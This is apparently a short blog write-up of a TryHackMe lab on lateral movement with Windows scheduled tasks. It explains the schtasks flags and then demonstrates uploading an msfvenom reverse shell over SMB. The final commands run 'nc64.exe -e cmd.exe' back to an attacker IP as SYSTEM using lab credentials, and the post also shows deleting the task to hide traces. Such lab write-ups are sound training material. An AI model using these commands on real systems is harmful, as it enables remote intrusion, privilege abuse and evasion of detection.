Spawn remote process with scheduled tasks

Spawn remote process with scheduled tasks

·

2 min read

Common windows feature abused by threat actors to move laterally and keep persistence is scheduled tasks. Threat actors love this as it's available on any windows installation.

note:

image.png Thanks mura

This blog post will demonstrate this method using the Lateral Movement and Pivoting room provided by TryHackMe Task 4.

How to create a scheduled task on a remote host

schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<payload>" /sc ONCE /sd 01/01/1970 /st 00:00

Command break down:

/s = specify the host we wish remotely issue the command too

/RU = Run task with specified user privilege (Defaults to current user account)

/create = creating the task

/tn = task name "mytask"

/tr = Task run (command to execute)

/sc = Frequency of task Minute, hourly, Daily.. etc

/sd = Start date, the date to execute the task

/st = start time, time of execution

/u = domain username

/p = password, if left blank will be prompted

As we can execute scheduled tasks manually the /sd and /st parameters are not so important in this scenario.

Manual task execution

schtasks /s TARGET /run /TN "THMtask1"

like a good threat actor we want to make sure to clean up after ourselves by deleting the task:

schtasks /S TARGET /TN "THMtask1" /DELETE /F

Demo TIME

Let's start by creating our payload using msfvenom

image.png

After creating our payload we need some way to get it onto the host, In this scenario I have a set of credentials where I can access a smbshare to upload my reverse shell too

image.png

Now that the reverse shell has successfully uploaded I need to now create my task, as we are creating a task on a privileged user I will need to specify the credentials (please ignore the formatting tryhackme attack box sucks)

image.png

schtasks /s 10.200.51.201 /RU "SYSTEM" /create /tn "THMtask69" /tr "<c:\tools\nc64.exe -e cmd.exe 10.50.49.81 4443>" /sc ONCE /sd 01/01/1925 /st 00:00 /u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever



schtasks /s 10.200.51.201 /run /TN "THMtask69" /u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever